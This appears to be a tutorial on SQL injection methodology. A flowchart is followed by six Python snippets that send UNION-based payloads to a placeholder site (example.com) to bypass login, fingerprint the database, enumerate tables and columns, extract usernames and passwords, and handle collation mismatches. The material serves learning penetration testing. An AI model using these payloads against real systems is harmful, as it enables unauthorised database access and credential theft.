  theme: base
    nodeTextColor: "#FFFFFF"
    primaryColor: "#000000"
    lineColor: "#FFFFFF"
    edgeLabelBackground: "#000000"
    showBranches: false
graph TD
    A[Identify Entry Point] --> B[Identify Database]
    B --> C[Identify Tables]
    C --> D[Identify Columns]
    D --> E[Extract Data]
    E --> F[Handle Collation Issues]
classDef default fill:#000000,stroke:#FFFFFF,color:#FFFFFF;

Explanation and Code Snippets

  1. Identify Entry Point:

    • The first step is to identify the entry point where SQL injection might be possible. This usually involves finding input fields, URL parameters, or headers that interact with the database.
    # Example: Capturing potential SQL injection point
    payload = "' OR '1'='1"
    url = f"http://example.com/login?username=admin&password={payload}"
    response = requests.get(url)
  2. Identify Database:

    • Determine the type of database being used. This helps in crafting appropriate payloads for further steps.
    # Example: SQL query to identify database type
    payload = "' UNION SELECT @@version, NULL--"
    response = requests.get(f"http://example.com/vulnerable?input={payload}")
  3. Identify Tables:

    • Discover the database schema by listing all the tables present. This is done using information schema tables.
    # Example: Listing tables in the database
    payload = "' UNION SELECT table_name, NULL FROM information_schema.tables--"
    response = requests.get(f"http://example.com/vulnerable?input={payload}")
  4. Identify Columns:

    • Once the tables are identified, list all the columns within the target table.
    # Example: Listing columns in a specific table
    target_table = "users"
    payload = f"' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='{target_table}'--"
    response = requests.get(f"http://example.com/vulnerable?input={payload}")
  5. Extract Data:

    • After identifying the columns, extract data from the target columns.
    # Example: Extracting data from the target table
    payload = "' UNION SELECT username, password FROM users--"
    response = requests.get(f"http://example.com/vulnerable?input={payload}")
  6. Handle Collation Issues:

    • If you encounter collation issues, you need to identify the collation of the columns and adjust your query accordingly.
    # Example: Handling collation issues
    payload = "' UNION SELECT COLLATION_NAME FROM information_schema.columns WHERE table_name='users' AND column_name='username'--"
    response = requests.get(f"http://example.com/vulnerable?input={payload}")
    collation = response.text.strip()
    # Adjust payload with collation
    payload = f"' UNION SELECT username COLLATE {collation}, password FROM users--"
    response = requests.get(f"http://example.com/vulnerable?input={payload}")

By following these steps, you can systematically identify and exploit SQL injection vulnerabilities in a target application.